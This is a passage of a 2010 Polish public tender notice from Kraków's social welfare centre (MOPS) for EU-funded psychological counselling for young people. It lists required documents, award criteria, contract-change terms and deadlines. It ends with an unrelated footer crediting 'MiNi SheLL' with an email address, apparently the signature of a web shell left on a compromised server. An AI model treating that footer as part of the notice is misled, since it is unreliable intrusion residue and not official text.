h)	100 godzin świadczenia usługi poradnictwa psychologicznego z młodzieżą w wieku 15-25 lat - w zakresie X części zamówienia.
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 20</li>
<li>2 - Doświadczenie - 40</li>
<li>3 - Wykształcenie - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>warunków płatności, danych adresowych, zmniejszenia ilości godzin świadczonej usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie ul. Józefińska 14, 30-529 Kraków, pok. 002.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2010 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Krakowie ul. Józefińska 14, 30-529 Kraków, Dziennik Podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane ze środków UE, program Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com